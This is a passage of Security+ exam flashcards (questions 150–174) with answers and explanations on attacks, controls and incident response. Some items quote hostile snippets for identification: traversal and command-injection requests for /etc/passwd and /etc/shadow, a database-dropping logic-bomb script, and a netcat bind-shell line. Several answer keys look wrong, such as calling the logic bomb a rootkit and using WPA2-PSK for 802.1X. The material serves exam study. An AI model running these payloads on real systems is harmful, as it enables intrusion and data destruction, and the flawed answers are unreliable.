Option d (ARP poisoning): This attack involves sending falsified ARP messages over the network to associate the attacker's MAC address with the IP address of another device. This allows the attacker to intercept, modify, or stop data intended for the target IP address. While this could lead to interception of traffic, the scenario described fits more closely with MAC flooding due to the nature of the Layer 2 address table entries provided.

Option c (MAC flooding) is the most likely scenario because the large number of similar entries in the Layer 2 address table suggests the switch has been overwhelmed, causing it to operate in a way that exposes network traffic to the attacker.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
150
Q

A security policy states that common words should not be used as passwords. A security auditor was able to perform a dictionary attack against corporate credentials. Which of the following controls was being violated?

a. Password complexity
b. Password history
c. Password reuse
d. Password length

A

a. Password complexity

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
151
Q

A SOC operator is analyzing a log file that contains the following entries:

[06-Apr-2021-18:00:06] GET /index.php/../../../../../../etc/passwd
[06-Apr-2021-18:01:07] GET /index.php/../../../../../../etc/shadow
[06-Apr-2021-18:01:26] GET /index.php/../../../../../../../../../../etc/passwd
[06-Apr-2021-18:02:16] GET /index.php?var1=;cat /etc/passwd;$var2=7865tgydk
[06-Apr-2021-18:02:56] GET /index.php?var1=;cat /etc/shadow;$var2=7865tgydk

Which of the following explains these log entries?

a. SQL injection and improper input-handling attempts
b. Cross-site scripting and resource exhaustion attempts
c. Command injection and directory traversal attempts
d. Error handling and privilege escalation attempts

A

c. Command injection and directory traversal attempts

Explanation:

c. Command injection and directory traversal attempts: The log entries show attempts to access sensitive files on the server by exploiting vulnerabilities. Specifically, the attacker is trying to use directory traversal (../../../../../../etc/passwd and ../../../../../../etc/shadow) to navigate to sensitive files. Additionally, the attacker is attempting command injection (var1=;cat /etc/passwd;) to execute commands on the server.

SQL injection and improper input-handling attempts: SQL injection involves inserting or injecting SQL queries via input data, which is not indicated by the given log entries. The log entries show attempts to access files and execute commands rather than SQL queries.

Cross-site scripting and resource exhaustion attempts: Cross-site scripting (XSS) involves injecting malicious scripts into web pages viewed by other users. Resource exhaustion attempts aim to deplete system resources. The log entries do not show evidence of either type of attack.

Error handling and privilege escalation attempts: Error handling involves managing errors in a system, and privilege escalation involves gaining higher-level access. The log entries do not specifically show evidence of attempts to exploit error handling or escalate privileges directly.

Command injection and directory traversal attempts accurately describe the nature of the log entries, which involve attempts to access sensitive files and execute commands on the server.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
152
Q

A security incident has been resolved. Which of the following BEST describes the importance of the final phase of the incident response plan?

a. It examines and documents how well the team responded, discovers what caused the incident, and determines how the incident can be avoided in the future.
b. It returns the affected systems back into production once systems have been fully patched, data restored, and vulnerabilities addressed.
c. It identifies the incident and the scope of the breach, how it affects the production environment, and the ingress point.
d. It contains the affected systems and disconnects them from the network, preventing further spread of the attack or breach.

A

a. It examines and documents how well the team responded, discovers what caused the incident, and determines how the incident can be avoided in the future.

Explanation:

a. It examines and documents how well the team responded, discovers what caused the incident, and determines how the incident can be avoided in the future.: This describes the lessons learned phase, which is a critical part of the final phase of the incident response plan. It involves reviewing the incident to understand the effectiveness of the response, identifying root causes, and implementing measures to prevent future incidents.

b. It returns the affected systems back into production once systems have been fully patched, data restored, and vulnerabilities addressed.: This describes the recovery phase, which occurs before the final phase. The recovery phase focuses on restoring systems to normal operation after the incident has been contained and eradicated.

c. It identifies the incident and the scope of the breach, how it affects the production environment, and the ingress point.: This describes the identification phase, which occurs at the beginning of the incident response process. This phase involves detecting and analyzing the incident to understand its scope and impact.

d. It contains the affected systems and disconnects them from the network, preventing further spread of the attack or breach.: This describes the containment phase, which focuses on limiting the spread and impact of the incident. It is not the final phase of the incident response plan.

The final phase of the incident response plan is crucial for improving future responses and enhancing the overall security posture of the organization. It provides an opportunity to learn from the incident and implement changes to prevent recurrence.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
153
Q

HOTSPOT (Drag and Drop is not supported)
Select the appropriate attack and remediation from each drop-down list to label the corresponding attack with its remediation.

INSTRUCTIONS
Not all attacks and remediation actions will be used.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:

  1. Attack Description :
    An attacker sends multiple SYNC packets from multiple sources
    Web server : Target Web Server
  2. Attack Description :
    The attack establishes a connection, which allows remote commands to be executed
    Web server : User
  3. Attack Description :
    The attack is self propagating and compromises a SQL database using well-known credentials as it moves through the network
    Web Server : Database server
  4. Attack Description :
    The attacker uses hardware to remotely monitor a user’s input activity to harvest credentials
    Web Server : Executive
  5. Attack Description :
    The attacker embeds hidden access in an internally developed application that bypasses account login
    Web Server : Application

Attack identified Best preventative or Remediation Action
a. Botnet a. Enable DDoS protection
b. RAT b. Patch Vulnerable systems
c. Logic Bomb c. Disable vulnerable services
d. Backdoor d. Change the default system password
e. Virus e. Update cryptographic algorithms
f. Spyware f. Change the default application password
g. Worm g. Implement 2FA using push notification
h. Adware h. Conduct a code review
i. Ransomware i. Implement a application fuzzing
j. Keylogger j. Implement a host-based IPS
k. Phishing k. Disable remote access service

A

An attacker sends multiple SYNC packets from multiple sources
Botnet, Enable DDoS protection

The attack establishes a conneciton which allows remote commands to be executed
RAT, Disable Remote access services

The attack is self-propagating and compromises a SQL database using well-known credentials as it moves though the network
Worm, change default application password

The attacker uses hardware to remotely monitor a user’s input activity to harvest credentials
Keylogger, implement 2FA using push notification

The attacker embeds hidden access in an internally developed application that bypasses account login
Backdoor, Conduct a code review

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
154
Q

SIMULATION
A company recently added a DR site and is redesigning the network. Users at the DR site are having issues browsing websites.

https://free-braindumps.com/comptia/free-sy0-601-braindumps.html?p=40

INSTRUCTIONS
Click on each firewall to do the following:
1. Deny cleartext web traffic.
2. Ensure secure management protocols are used.
3. Resolve issues at the DR site.
The ruleset order cannot be modified due to outside constraints.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

A

Firewall 1:
10.0.0.1/24 - ANY - DNS - PERMIT
10.0.0.1/24 - ANY - HTTPS - PERMIT
ANY - 10.0.0.1/24 - SSH - PERMIT
ANY - 10.0.0.1/24 - HTTPS - PERMIT
ANY - 10.0.0.1/24 - HTTP - DENY

Firewall 2:
10.0.1.1/24 - ANY - DNS - PERMIT
10.0.1.1/24 - ANY - HTTPS - PERMIT
ANY - 10.0.1.1/24 - SSH - PERMIT
ANY - 10.0.1.1/24 - HTTPS - PERMIT
ANY - 10.0.1.1/24 - HTTP - DENY

Firewall 3:
192.168.0.1/24 - ANY - DNS - PERMIT
192.168.0.1/24 - ANY - HTTPS - PERMIT
ANY - 192.168.0.1/24 - SSH - PERMIT
ANY - 192.168.0.1/24 - HTTPS - PERMIT
ANY - 192.168.0.1/24 - HTTP - DENY

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
155
Q

SIMULATION
An attack has occurred against a company.

https://free-braindumps.com/comptia/free-sy0-601-braindumps.html?p=40

INSTRUCTIONS
You have been tasked to do the following:
-Identify the type of attack that is occurring on the network by clicking on the attacker’s tablet and reviewing the output.
-Identify which compensating controls a developer should implement on the assets, in order to reduce the effectiveness of future attacks by dragging them to the correct server.

All objects will be used, but not all placeholders may be filled. Objects may only be used once.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Select type of attack :
1. SQL Injection
2. Cross Site Scripting
3. XML injection
4. Session Hijacking

Drag & drop :
Input validation
Code Review
WAF
URL Filtering
Record Level Access Control

against servers :
Web Server
Database
Application Source Code withing Repository
CRM Server

A
  1. Cross Site Scripting
    Web Server : WAF (Web Application Firewall), URL Filtering
    Database : Input Validation
    Application Source Code withing Repository : Code Review
    CRM Server : Record level access control
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
156
Q

SIMULATION

https://free-braindumps.com/comptia/free-sy0-601-braindumps.html?p=40

A systems administrator needs to install a new wireless network for authenticated guest access. The wireless network should support 802.1X using the most secure encryption and protocol available.

INSTRUCTIONS
Perform the following steps:
4. Configure the RADIUS server.
5. Configure the WiFi controller.
6. Preconfigure the client for an incoming guest. The guest AD credentials are:

User: guest01

Password: guestpass
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

WiFi Controller
SSID : CORPGUEST
Shared Key:
AAA Server IP :
PSK :
Authentication type :
Controller IP : 192.168.1.10

RADIUS server
Shared Key : SECRET
Client IP :
Authentication type :
Server IP: 192.168.1.20

Wireless Client
SSID :
Username :
User password :
PSK :
Authentication type :

A

WiFi Controller
SSID : CORPGUEST
Shared Key: SECRET
AAA Server IP : 192.168.1.20
PSK : Zack@123+
Authentication type : WPA2-PSK
Controller IP : 192.168.1.10

RADIUS server
Shared Key : SECRET
Client IP : 192.168.1.10
Authentication type : Active Directory
Server IP: 192.168.1.20

Wireless Client
SSID : CORPGUEST
Username : guest01
User password : guestpass
PSK : Zack@123+
Authentication type : WPA-PSK

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
157
Q

HOTSPOT (Drag and Drop is not supported)
An incident has occurred in the production environment.

INSTRUCTIONS
Analyze the command outputs and identify the type of compromise.
If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.
Hot Area:

  1. Command ouput1
    $ cat /var/log/www/file.sh
    #!/bin/bash

user=’grep john /etc/password’
if [ $user = “”]; then
msql -u root -p mys3cr2tdbpw -e “drop database production”
fi

$crontab -l
*/5 * * * * /var/log/www/file.sh

Compromise type 1 :
a. RAT
b. Backdoor
c. Logic bomb
d. SQL injection
e. Rootkit

  1. Command Output 2
    $ cat /var/log/www/file.sh
    $!/bin/bash

date=”date +%Y-%m-%y”
echo “type in your full name : “
read loggedName
nc -l -p 31337 -e /bin/bash
wget www.eicar.org/download/eicar.com/txt
echo “Hello, $loggedInName the virus file has been downloaded”

Compromised Type 2 :
a. SQL injection
b. RAT
c. Rootkit
d. Backdoor
e. Logic bomb

A
  1. e. Rootkit
  2. b. RAT
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
158
Q

After a recent security incident, a security analyst discovered that unnecessary ports were open on a firewall policy for a web server. Which of the following firewall polices would be MOST secure for a web server?

a. source Destination Port Action
Any Any TCP 53 Allow
Any Any TCP 80 Allow
Any Any TCP 443 Allow
Any Any Any Any

b. source Destination Port Action
Any Any TCP 53 Deny
Any Any TCP 80 Allow
Any Any TCP 443 Allow
Any Any Any Allow

c. source Destination Port Action
Any Any TCP 80 Deny
Any Any TCP 443 Allow
Any Any Any Allow

d. source Destination Port Action
Any Any TCP 80 Allow
Any Any TCP 443 Allow
Any Any Any Deny

A

d. source Destination Port Action
Any Any TCP 80 Allow
Any Any TCP 443 Allow
Any Any Any Deny

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
159
Q

A large bank with two geographically dispersed data centers is concerned about major power disruptions at both locations. Every day each location experiences very brief outages that last for a few seconds. However, during the summer a high risk of intentional brownouts that last up to an hour exists, particularly at one of the locations near an industrial smelter. Which of the following is the BEST solution to reduce the risk of data loss?

a. Dual supply
b. Generator
c. UPS
d. POU
e. Daily backups

A

c. UPS (Uninterruptible Power Supply)
Explanation:

A UPS (Uninterruptible Power Supply) is the best solution in this scenario for several reasons:

Brief outages: A UPS can provide immediate power during brief outages that last for a few seconds to a few minutes, ensuring that equipment stays operational without interruption.

Extended outages and brownouts: While a UPS can handle brief outages on its own, it can also bridge the gap until a backup generator can be brought online during longer outages or intentional brownouts.

Protection from power fluctuations: A UPS can protect against power surges and brownouts, which can damage sensitive equipment or cause data corruption.

Here’s why other options are less suitable:

Dual supply: This ensures redundancy by using two power sources, but if both sources are affected by the same disruption (e.g., a brownout), it won't fully mitigate the risk.

Generator: A generator is excellent for extended outages, but it takes time to start up and does not protect against very brief outages. Combining a UPS with a generator would be ideal, but the UPS alone is necessary to handle the immediate power loss.

POU (Power Outlet Unit): This is typically used for distributing power within a data center but does not provide backup power.

Daily backups: While important for data recovery, they do not prevent data loss or service interruption during the power outages themselves. They address data loss after the fact, not in real-time.

Thus, a UPS is the most effective immediate solution to prevent data loss and ensure continuous operation during brief outages and while transitioning to a backup generator during extended power disruptions.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
160
Q

Which of the following would be the BEST way to analyze diskless malware that has infected a VDI?

a. Shut down the VDI and copy off the event logs.
b. Take a memory snapshot of the running system.
c. Use NetFlow to identify command-and-control IPs.
d. Run a full on-demand scan of the root volume.

A

b. Take a memory snapshot of the running system

VDI = Virtual Desktop Infrastructure

Here’s why this is the preferred option:

Preserves Current State: Taking a memory snapshot captures the current state of the running system, including any processes, network connections, and memory-resident malware.

Forensic Analysis: Memory snapshots allow forensic analysts to examine the active memory of the infected VDI instance. This can reveal running processes, injected code, network connections, and potentially malicious behavior.

Non-invasive: Unlike shutting down the VDI (option a), which could potentially disrupt or alter the malware's behavior, taking a memory snapshot is non-invasive and allows the VDI to continue running, potentially gathering more information about the malware's activities.

Focus on Volatile Data: Diskless malware typically operates in memory and may leave minimal traces on disk, making memory analysis crucial for identifying and understanding its activities.

Options c and d (using NetFlow to identify command-and-control IPs and running a full on-demand scan of the root volume) are less effective for analyzing diskless malware in a VDI context. NetFlow analysis might not capture all relevant details of a diskless malware’s behavior, and a traditional on-demand scan may not detect malware that operates entirely in memory.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
161
Q

Users are presented with a banner upon each login to a workstation. The banner mentions that users are not entitled to any reasonable expectation of privacy and access is for authorized personnel only. In order to proceed past that banner, users must click the OK button. Which of the following is this an example of?

a. AUP
b. NDA
c. SLA
d. MOU

A

a. AUP (Acceptable Use Policy)

Here’s why:

Acceptable Use Policy (AUP): AUPs are policies that define the rules and guidelines for using an organization's IT resources, including workstations and networks. They typically inform users about their responsibilities and limitations regarding the use of these resources. A banner presented at login that users must acknowledge (by clicking OK) serves as a form of acknowledgment and agreement to comply with the AUP.

Banner Warning: The banner presented to users upon login informs them that they have no reasonable expectation of privacy and that access is only for authorized personnel. By clicking OK, users acknowledge their understanding of these terms and agree to abide by them.

Options b, c, and d are not directly related to the scenario described:

NDA (Non-Disclosure Agreement): An NDA is a legal contract that outlines confidential material, knowledge, or information that parties wish to share with one another for certain purposes, but wish to restrict access to or by third parties.

SLA (Service Level Agreement): An SLA is a contract between a service provider and a customer that outlines the level of service the customer can expect, including metrics like uptime and response times.

MOU (Memorandum of Understanding): An MOU is a document outlining an agreement between parties that may not be legally binding but indicates a willingness to move forward with a certain course of action.

AUP vs NDA :

Acceptable Use Policy (AUP):
    AUPs govern the proper use of an organization's IT resources, defining rules and guidelines for users regarding access, behavior, and responsibilities.
    Typically, AUPs are presented to users upon accessing IT systems, requiring their acknowledgment and agreement to comply with stated policies.
    In the scenario described, users acknowledge their understanding and agreement to comply with the organization's IT usage policies (such as privacy expectations and authorized access) by clicking OK on a banner.

Non-Disclosure Agreement (NDA):
    NDAs are legal agreements between parties to protect confidential information shared during specific interactions or projects.
    They outline what information is considered confidential, who can access it, and the consequences of disclosing that information to unauthorized parties.
    NDAs are typically used in situations where confidential information, trade secrets, or proprietary data need protection from unauthorized disclosure.

In the scenario where users are presented with a banner upon login, the primary focus is on informing users about their responsibilities and limitations regarding IT system usage, not about protecting specific confidential information or trade secrets. Therefore, while NDAs are crucial for protecting sensitive information in certain contexts, they are not directly applicable to the situation where users are agreeing to comply with IT usage policies.

In summary, AUP is the most appropriate answer because it directly relates to the rules governing the use of IT resources and user responsibilities in the described scenario.

(Braindump : b)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
162
Q

The Chief Information Security Officer is concerned about employees using personal email rather than company email to communicate with clients and sending sensitive business information and PII. Which of the following would be the BEST solution to install on the employees’ workstations to prevent information from leaving the company’s network?

a. HIPS
b. DLP
c. HIDS
d. EDR

A

b. DLP (Data Loss Prevention)

Here’s why DLP is the most appropriate choice:

Data Loss Prevention (DLP): DLP solutions are designed to monitor, detect, and prevent the unauthorized transmission of sensitive data outside the organization's network. They can enforce policies that govern what type of data can be sent via email, including scanning email content and attachments for sensitive information like PII, financial data, or confidential business information.

Functionality: DLP solutions can identify sensitive data based on predefined policies (such as keywords, regular expressions, or data classification) and enforce actions (such as blocking, encrypting, or alerting) when unauthorized transmissions occur.

Application to the Scenario: In this case, deploying DLP on employees' workstations would help mitigate the risk of employees inadvertently or intentionally sending sensitive information via personal email accounts. It provides a proactive measure to enforce company policies regarding data protection and ensures that sensitive data remains within authorized channels.

In contrast, the other options are less directly focused on preventing unauthorized data transmission via personal email:

HIPS (Host-based Intrusion Prevention System): Primarily focused on detecting and blocking unauthorized network attacks and exploits targeting specific host systems.
HIDS (Host-based Intrusion Detection System): Monitors and analyzes the internals of a computing system (like logs and file system changes) for signs of intrusion or unauthorized activities.
EDR (Endpoint Detection and Response): Provides real-time monitoring and response to threats on endpoints, focusing more on detecting and responding to malicious activities rather than preventing data loss through unauthorized emails.

(Braindump : d. EDR)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
163
Q

On the way into a secure building, an unknown individual strikes up a conversation with an employee. The employee scans the required badge at the door while the unknown individual holds the door open, seemingly out of courtesy, for the employee. Which of the following social engineering techniques is being utilized?

a. Shoulder surfing
b. Watering-hole attack
c. Tailgating
d. Impersonation

A

c. Tailgating

Explanation:

Tailgating: This occurs when an unauthorized individual follows closely behind an authorized person to gain entry into a restricted area without proper authentication. In this case, the unknown individual is taking advantage of the employee's courtesy by holding the door open and thereby bypassing the secure access control, exploiting the trusting nature of the employee.

Shoulder surfing: Involves observing someone's confidential information (like passwords or PINs) by looking over their shoulder as they enter it.

Watering-hole attack: Targets a specific group by compromising websites they are likely to visit, rather than physical access scenarios.

Impersonation: Involves pretending to be someone else to gain access, which is not explicitly demonstrated in the scenario provided.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
164
Q

Two hospitals merged into a single organization. The privacy officer requested a review of all records to ensure encryption was used during record storage, in compliance with regulations. During the review, the officer discovered that medical diagnosis codes and patient names were left unsecured. Which of the following types of data does this combination BEST represent?

a. Personal health information
b. Personally identifiable information
c. Tokenized data
d. Proprietary data

A

a. Personal health information (PHI)

Explanation:

Personal health information (PHI) includes any individually identifiable health information that is held or maintained by a covered entity or business associate. This includes medical diagnosis codes, patient names, and other health-related information.

Personally identifiable information (PII) typically refers to any information that can be used to identify an individual, which could include personal health information but is broader in scope.

Tokenized data refers to data that has been replaced with a non-sensitive equivalent (token) that has no extrinsic or exploitable meaning or value.

Proprietary data refers to information that is owned or controlled by an organization and is not specifically related to personal or health information.

In the context provided, the concern about medical diagnosis codes and patient names being left unsecured directly relates to the privacy and security requirements around personal health information (PHI), making option a. Personal health information the most appropriate choice.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
165
Q

A company discovered that terabytes of data have been exfiltrated over the past year after an employee clicked on an email link. The threat continued to evolve and remain undetected until a security analyst noticed an abnormal amount of external connections when the employee was not working. Which of the following is the MOST likely threat actor?

a. Shadow IT
b. Script kiddies
c. APT
d. Insider threat

A

c. APT (Advanced Persistent Threat)

Explanation:

Advanced Persistent Threat (APT): APTs are sophisticated adversaries, often state-sponsored or well-funded, that conduct prolonged and targeted attacks on specific organizations. They are characterized by their ability to remain undetected for extended periods, exfiltrate large amounts of data, and adapt their tactics to avoid detection.

Here’s why the other options are less likely:

Shadow IT: Refers to unauthorized applications or services used within an organization without explicit approval. While it can pose security risks, it typically doesn't involve sophisticated data exfiltration over an extended period as described.

Script kiddies: Usually refer to individuals with limited technical skills who use existing scripts or tools to launch simple attacks. They are unlikely to sustain a sophisticated operation over a year without detection.

Insider threat: While an insider could be involved in data exfiltration, the prolonged nature and sophistication of the attack described (abnormal external connections over a long period) suggest a more organized and persistent threat actor than a typical insider threat scenario.

Therefore, considering the prolonged and stealthy nature of the attack targeting specific data, an Advanced Persistent Threat (APT) is the most plausible threat actor in this case.

(Braindump : d. Insider threat)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
166
Q

An untrusted SSL certificate was discovered during the most recent vulnerability scan. A security analyst determines the certificate is signed properly and is a valid wildcard. This same certificate is installed on the other company servers without issue. Which of the following is the MOST likely reason for this finding?

a. The required intermediate certificate is not loaded as part of the certificate chain.
b. The certificate is on the CRL and is no longer valid.
c. The corporate CA has expired on every server, causing the certificate to fail verification.
d. The scanner is incorrectly configured to not trust this certificate when detected on the server.

A

a. The required intermediate certificate is not loaded as part of the certificate chain.

Explanation:

Intermediate Certificate: When an SSL/TLS certificate is issued, it often relies on an intermediate certificate (or chain of intermediate certificates) to verify its authenticity up to a trusted root certificate authority (CA). If the intermediate certificate is not properly installed on the server along with the SSL certificate, the server may not send the full certificate chain during the SSL handshake.

SSL Certificate Chain: During the SSL handshake process, the client (vulnerability scanner, in this case) needs to verify the entire chain of certificates from the server's SSL certificate up to a trusted root certificate authority. If any intermediate certificate is missing, the chain of trust is broken, and the certificate might appear as untrusted to the scanner.

Other Options Explanation:
    b. The certificate is on the CRL and is no longer valid: This would typically result in the certificate being flagged as revoked, not untrusted.
    c. The corporate CA has expired on every server, causing the certificate to fail verification: This would indicate an issue with the corporate CA's validity, not specifically with the SSL certificate's trust status.
    d. The scanner is incorrectly configured to not trust this certificate when detected on the server: This would be a configuration issue on the scanner side and less likely the reason for the untrusted status if the certificate is valid and properly configured on other servers.

Therefore, a. The required intermediate certificate is not loaded as part of the certificate chain is the most likely reason for the vulnerability scanner to report the SSL certificate as untrusted despite its validity and installation on other servers without issue.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
167
Q

A company wants to improve end users’ experiences when they log in to a trusted partner website. The company does not want the users to be issued separate credentials for the partner website. Which of the following should be implemented to allow users to authenticate using their own credentials to log in to the trusted partner’s website?

a. Directory service
b. AAA server
c. Federation
d. Multifactor authentication

A

c. Federation

Explanation:

Federation enables a single sign-on (SSO) experience across different organizations or domains. It allows users to use their existing credentials from one organization (in this case, the company's credentials) to access services and resources in another organization (the trusted partner's website).

How Federation Works:
    The company and the trusted partner establish a trust relationship.
    Users authenticate once with their company's identity provider (IdP).
    Upon accessing the trusted partner's website, the company's IdP securely passes authentication information to the partner's service provider (SP).
    The SP trusts the authentication from the IdP and grants access without requiring the user to re-enter credentials.

Benefits of Federation:
    Simplifies user experience by eliminating the need for separate credentials.
    Enhances security as authentication and authorization are handled centrally by the company's IdP.
    Reduces administrative overhead by managing user accounts centrally.

Other Options Explained:

a. Directory service: While directory services manage user identities and permissions within an organization, they typically do not facilitate SSO across different domains or organizations.

b. AAA server (Authentication, Authorization, and Accounting): AAA servers are used for managing network access and are not specifically designed for cross-organization authentication.

d. Multifactor authentication (MFA): While MFA enhances security by requiring multiple factors for authentication, it does not address the requirement of using existing credentials across organizations without issuing separate credentials.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
168
Q

A company is under investigation for possible fraud. As part of the investigation, the authorities need to review all emails and ensure data is not deleted. Which of the following should the company implement to assist in the investigation?

a. Legal hold
b. Chain of custody
c. Data loss prevention
d. Content filter

A

a. Legal hold

Explanation:

Legal hold is a process in which an organization preserves all relevant information related to a legal case or investigation. It ensures that potentially relevant data, including emails, cannot be deleted, altered, or destroyed. Here’s why it's the correct choice:

Preservation of Data: Legal hold mandates that all potentially relevant data, including emails, must be preserved in its original state. This prevents any tampering or deletion that could hinder the investigation.

Compliance: It ensures compliance with legal and regulatory requirements by preserving data that may be subject to investigation or litigation.

Process: Legal hold involves identifying and suspending the routine deletion or modification of relevant data, including emails, and keeping them intact until the hold is lifted.

Other Options Explained:

b. Chain of custody: Chain of custody refers to the chronological documentation or paper trail that records the sequence of custody, control, transfer, analysis, and disposition of physical and electronic evidence. While important for maintaining evidence integrity, it primarily applies to physical evidence rather than digital data like emails.

c. Data loss prevention (DLP): DLP systems aim to prevent unauthorized transmission of sensitive information outside the organization. While they can help prevent accidental or malicious data leaks, they do not specifically ensure that data is preserved for legal investigations.

d. Content filter: Content filters are used to monitor and control the flow of data, typically to enforce acceptable use policies and protect against malware and phishing. They do not focus on preserving data for legal investigations.

Therefore, a. Legal hold is the best choice for ensuring that emails and other relevant data are preserved intact and accessible for the investigation without the risk of deletion or alteration.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
169
Q

A user wanted to catch up on some work over the weekend but had issues logging in to the corporate network using a VPN. On Monday, the user opened a ticket for this issue but was able to log in successfully. Which of the following BEST describes the policy that is being implemented?

a. Time-based logins
b. Geofencing
c. Network location
d. Password history

A

a. Time-based logins

Explanation:

Time-based logins refer to policies or configurations that restrict or allow access to systems, networks, or applications based on specific times or schedules. In this case:
    The user experienced issues logging in over the weekend but was able to log in successfully on Monday.
    This inconsistency suggests that access might be restricted or problematic during non-standard hours (such as weekends) due to time-based access controls.

Why the Other Options are Not Appropriate:

b. Geofencing: Geofencing policies restrict access based on the physical location of the user. However, the issue described does not involve location-based access restrictions but rather time-based access.

c. Network location: Similar to geofencing, network location policies define access based on the user's network location (e.g., internal network vs. external network). This scenario does not indicate any issues related to network location restrictions.

d. Password history: Password history policies dictate how frequently passwords can be reused or how often they must be changed. This is unrelated to the described issue of intermittent access during specific times.

Therefore, a. Time-based logins is the most appropriate description of the policy being implemented based on the user’s experience of successful login during standard work hours but issues during the weekend.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
170
Q

A major political party experienced a server breach. The hacker then publicly posted stolen internal communications concerning campaign strategies to give the opposition party an advantage. Which of the following BEST describes these threat actors?

a. Semi-authorized hackers
b. State actors
c. Script kiddies
d. Advanced persistent threats

A

b. State actors

Explanation:

State actors are typically government-sponsored entities or groups acting on behalf of a government. They often have significant resources, capabilities, and motivations to conduct cyber attacks for political, economic, or military purposes.

Why the Other Options are Not Appropriate:

a. Semi-authorized hackers: This term is less commonly used in cybersecurity and does not specifically denote state-sponsored activity. It might imply individuals with some level of authorization but does not fit the description of government-backed actors.

c. Script kiddies: Script kiddies are individuals who use existing tools and scripts to launch attacks without deep technical knowledge. They are generally not sophisticated enough to orchestrate a breach of this scale or purpose.

d. Advanced persistent threats (APTs): APTs are typically sophisticated threat actors that maintain long-term access to a target network or system for espionage or data exfiltration. While they can be state-sponsored, the scenario does not explicitly describe ongoing persistence but rather a breach and immediate public dissemination.

Therefore, b. State actors best describes the threat actors involved in breaching a major political party’s server and leaking sensitive communications for political advantage.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
171
Q

A company is required to continue using legacy software to support a critical service. Which of the following BEST explains a risk of this practice?

a. Default system configuration
b. Unsecure protocols
c. Lack of vendor support
d. Weak encryption

A

c. Lack of vendor support

Explanation:

Legacy software often ceases to receive vendor support over time, which means the vendor no longer provides updates, security patches, or technical assistance. This lack of support leaves the software vulnerable to newly discovered vulnerabilities and exploits.

Why the Other Options are Not Appropriate:

a. Default system configuration: While legacy software may retain default configurations, the primary risk lies in the absence of security updates rather than the configuration itself.

b. Unsecure protocols: This could be a concern with legacy software, but it's not the most direct risk associated with continuing to use it. The lack of vendor support poses a more immediate threat.

d. Weak encryption: This could also be a concern depending on the software, but again, it's not the most direct risk posed by lack of vendor support.

Therefore, c. Lack of vendor support is the best explanation because it directly addresses the risk of not receiving necessary updates and patches to secure the software against evolving threats.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
172
Q

A security analyst has been tasked with ensuring all programs that are deployed into the enterprise have been assessed in a runtime environment. Any critical issues found in the program must be sent back to the developer for verification and remediation. Which of the following BEST describes the type of assessment taking place?

a. Input validation
b. Dynamic code analysis
c. Fuzzing
d. Manual code review

A

b. Dynamic code analysis

Explanation:

Dynamic code analysis, also known as dynamic application security testing (DAST), involves assessing applications in a runtime environment to identify vulnerabilities and security issues. This process typically involves interacting with the running application to simulate how an attacker might exploit it. It focuses on identifying weaknesses that could be exploited while the application is running.

Why the Other Options are Not Appropriate:

a. Input validation: This term refers to a specific aspect of security testing related to ensuring that input data is correctly handled and validated by the application, which is different from the broader runtime assessment described.

c. Fuzzing: Fuzzing involves feeding invalid, unexpected, or random data as inputs to a software application to identify vulnerabilities. While related to dynamic analysis, it specifically focuses on input handling and fault tolerance testing.

d. Manual code review: This involves a manual inspection of the source code to identify potential security issues and bugs before deployment, which is not the same as assessing programs in a runtime environment.

Therefore, b. Dynamic code analysis aligns best with the scenario where runtime assessment is conducted to find critical issues in deployed programs.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
173
Q

Which of the following can work as an authentication method and as an alerting mechanism for unauthorized access attempts?

a. Smart card
b. Push notifications
c. Attestation service
d. HMAC-based
e. one-time password

A

b. Push notifications

Explanation:

Push notifications can serve a dual purpose in security:

Authentication Method: Push notifications are commonly used in two-factor authentication (2FA) setups where a user receives a push notification on their registered device (like a smartphone) to approve or deny access to an application or service.

Alerting Mechanism: Push notifications can also serve as an alerting mechanism for unauthorized access attempts. If an unauthorized attempt is made and triggers a push notification (even if the user doesn't approve it), it can alert the user and possibly security operations about the attempted access.

Why the Other Options are Not as Suitable:

a. Smart card: While smart cards provide authentication, they do not typically function as alerting mechanisms for unauthorized access attempts.

c. Attestation service: Attestation services verify the integrity and authenticity of software and hardware components but are not directly involved in user authentication or unauthorized access alerting.

d. HMAC-based: HMAC (Hash-based Message Authentication Code) is a mechanism used for message integrity and authentication but is not typically used as an authentication method for users or for alerting unauthorized access attempts.

e. One-time password: One-time passwords (OTP) are used for authentication but do not directly serve as alerting mechanisms for unauthorized access attempts.

Therefore, b. Push notifications is the most appropriate choice as it integrates authentication with the ability to alert users and administrators about potential unauthorized access attempts in real-time.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
174
Q

A company has a flat network in the cloud. The company needs to implement a solution to segment its production and non-production servers without migrating servers to a new network. Which of the following solutions should the company implement?

a. Intranet
b. Screened subnet
c. VLAN segmentation
d. Zero Trust

A

c. VLAN segmentation

Explanation:

VLAN segmentation allows you to logically divide a single physical network into multiple virtual networks (VLANs). Each VLAN operates as a separate broadcast domain, enabling you to isolate traffic between different segments. This segmentation can be achieved without physically restructuring the network, making it ideal for cloud environments where servers are often provisioned within a single network segment.

